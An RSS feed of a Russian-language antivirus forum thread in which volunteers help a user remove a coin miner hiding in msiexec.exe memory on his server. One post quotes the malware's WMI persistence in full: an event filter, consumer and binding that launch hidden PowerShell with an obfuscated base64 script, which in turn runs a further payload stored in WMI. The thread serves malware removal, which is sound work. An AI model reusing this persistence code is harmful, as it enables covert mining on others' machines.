<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Win32/CoinMiner.DV]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Win32/CoinMiner.DV форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Tue, 28 Apr 2026 21:34:21 +0300</pubDate>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104536/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			похоже, здесь используется запуск через WMI закодированного скрипта, возможно именно этот скрипт содержит запуск майнера, связанного с процессом msiexec<br /><br /><br />====quote====<br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; POWERSHELL.EXE<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4A5BC7F377000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;9.0<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;473600 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;14.07.2009 в 03:49:07<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 14.07.2009 в 05:39:20<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 13.07.2009 в 23:49:07<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0.1<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows character-mode user interface (CUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 64-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Действительна, подписано Microsoft Windows<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Оригинальное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;PowerShell.EXE.MUI<br />Версия файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;6.1.7600.16385 (win7_rtm.090713-1255)<br />Описание &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Windows PowerShell<br />Производитель &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Microsoft Corporation<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 852D67A27E454BD389FA7F02A8CBE23F<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Namespace &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \\.\root\subscription<br />Consumer_Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; FsxxleConsumer<br />Consumer_Class &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CommandLineEventConsumer<br />Consumer_CommandLineTemplatepowershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg<WBR/>&shy;AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA<WBR/>&shy;aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt<WBR/>&shy;AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA<WBR/>&shy;KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4<WBR/>&shy;AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A<WBR/>&shy;cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj<WBR/>&shy;ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA<WBR/>&shy;aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy<WBR/>&shy;AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA<WBR/>&shy;YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs<WBR/>&shy;AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA<WBR/>&shy;aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp<WBR/>&shy;AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA<WBR/>&shy;bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl<WBR/>&shy;AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA<WBR/>&shy;IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg<WBR/>&shy;ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA<WBR/>&shy;aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw<WBR/>&shy;AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A<WBR/>&shy;ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1<WBR/>&shy;AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA<WBR/>&shy;eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0<WBR/>&shy;AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A<WBR/>&shy;ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh<WBR/>&shy;AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA<WBR/>&shy;KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz<WBR/>&shy;AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA<WBR/>&shy;WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl<WBR/>&shy;AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA<WBR/>&shy;SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu<WBR/>&shy;AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A<WBR/>&shy;ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo<WBR/>&shy;AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=<br />Filter_Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; FsxxleFilter<br />Filter_Class &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;__EventFilter<br />Filter_Query &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'<br />#MOF_Bind# &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />instance of __FilterToConsumerBinding<br />{<br />	Consumer = "CommandLineEventConsumer.Name="FsxxleConsumer"";<br />	Filter = "__EventFilter.Name="FsxxleFilter"";<br />};<br /><br />#MOF_Event# &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />instance of __EventFilter<br />{<br />	EventNamespace = "root\\cimv2";<br />	Name = "FsxxleFilter";<br />	Query = "SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";<br />	QueryLanguage = "WQL";<br />};<br /><br />#MOF_Consumer# &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />instance of CommandLineEventConsumer<br />{<br />	CommandLineTemplate = "powershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg<WBR/>&shy;AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA<WBR/>&shy;aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt<WBR/>&shy;AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA<WBR/>&shy;KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4<WBR/>&shy;AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A<WBR/>&shy;cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj<WBR/>&shy;ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA<WBR/>&shy;aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy<WBR/>&shy;AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA<WBR/>&shy;YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs<WBR/>&shy;AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA<WBR/>&shy;aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp<WBR/>&shy;AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA<WBR/>&shy;bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl<WBR/>&shy;AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA<WBR/>&shy;IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg<WBR/>&shy;ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA<WBR/>&shy;aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw<WBR/>&shy;AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A<WBR/>&shy;ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1<WBR/>&shy;AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA<WBR/>&shy;eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0<WBR/>&shy;AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A<WBR/>&shy;ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh<WBR/>&shy;AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA<WBR/>&shy;KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz<WBR/>&shy;AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA<WBR/>&shy;WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl<WBR/>&shy;AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA<WBR/>&shy;SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu<WBR/>&shy;AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A<WBR/>&shy;ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo<WBR/>&shy;AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=";<br />	Name = "FsxxleConsumer";<br />};<br />=============<br /> <br />
			<i>28.09.2018 09:29:04, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104536/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104536/</guid>
			<pubDate>Fri, 28 Sep 2018 09:29:04 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104192/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			+ еще вариант, сделать образ автозапуска из безопасного режима системы <br />
			<i>24.08.2018 12:48:58, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104192/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104192/</guid>
			<pubDate>Fri, 24 Aug 2018 12:48:58 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104191/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_rQ2ENWX5" href="/user/34370/" bx-tooltip-user-id="34370">Роман Т</a> написал:<br />Такое чувство, что он компилируется в памяти, почему он не находится антивирусом на диске?<br />=============<br />возможно, майнер загружается в память извне в результате эксплуатации какой-либо уязвимости системных служб или установленных приложений.<br /><br />ваш сервер виден из внешней сети напрямую, или доступен только после подключения по VPN? <br />
			<i>24.08.2018 10:07:56, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104191/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104191/</guid>
			<pubDate>Fri, 24 Aug 2018 10:07:56 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104188/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			24.08.2018 9:04:28;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = msiexec.exe(4492);модифицированный Win32/CoinMiner.DV потенциально нежелательная программа;очищен удалением<br />Такое чувство, что он компилируется в памяти, почему он не находится антивирусом на диске? <br />
			<i>24.08.2018 09:13:23, Роман Т.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104188/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104188/</guid>
			<pubDate>Fri, 24 Aug 2018 09:13:23 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104186/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			24.08.2018 9:04:28;Оперативная память = msiexec.exe(4492);модифицированный Win32/CoinMiner.DV потенциально нежелательная программа;очищен удалением <br />
			<i>24.08.2018 09:06:30, Роман Т.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104186/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104186/</guid>
			<pubDate>Fri, 24 Aug 2018 09:06:30 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104182/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Что сейчас с проблемой обнаружения майнера в оперативной памяти? <br />
			<i>24.08.2018 07:46:36, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104182/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104182/</guid>
			<pubDate>Fri, 24 Aug 2018 07:46:36 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104180/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Выкладываю <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=106680">AdwCleaner[C00].txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=106681">FRST.txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=106682">Addition.txt</a><br /><i>24.08.2018 07:24:45, Роман Т.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104180/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104180/</guid>
			<pubDate>Fri, 24 Aug 2018 07:24:45 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104176/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			1) Выполните лог в AdwCleaner<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic7084/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic7084/</a></noindex><br /><br />после завершения сканирования:<br />Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой )<br />На вкладке:<br />Папки (Folders) для Mail.Ru &nbsp;и Yandex снимите [V]<br /><br /><br />Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие<br />с автоперезагрузкой<br /><br />2) Выполните FRST: <noindex><a href="http://forum.esetnod32.ru/forum9/topic2798/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic2798/</a></noindex> <br />
			<i>23.08.2018 19:30:55, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104176/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104176/</guid>
			<pubDate>Thu, 23 Aug 2018 19:30:55 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104175/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Выкладываю <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=106676">malware.txt</a><br /><i>23.08.2018 19:01:24, Роман Т.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104175/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104175/</guid>
			<pubDate>Thu, 23 Aug 2018 19:01:24 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104172/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			добавьте лог проверки в малваребайт<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic10688/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic10688/</a></noindex> <br />
			<i>23.08.2018 14:57:42, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104172/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104172/</guid>
			<pubDate>Thu, 23 Aug 2018 14:57:42 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Win32/CoinMiner.DV</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14912/message104171/">Win32/CoinMiner.DV</a></b> <i>WMI/CommandLineEventConsumer/FsxxleFilter/powershell &amp;base64_script</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Словил майнер на Сервере и не могу избавится: Оперативная память = msiexec.exe(16684);модифицированный Win32/CoinMiner.DV <br /><br /><br /><noindex><a href="http://rgho.st/8nlhpdNlZ" target="_blank" rel="nofollow">TS-SERV_2018-08-23_12-05-46</a></noindex><br /><noindex><a href="http://rgho.st/6rzh7WrrQ" target="_blank" rel="nofollow">Журнал Антивируса</a></noindex> <br />
			<i>23.08.2018 14:39:36, Роман Тимашков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14912/message104171/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14912/message104171/</guid>
			<pubDate>Thu, 23 Aug 2018 14:39:36 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
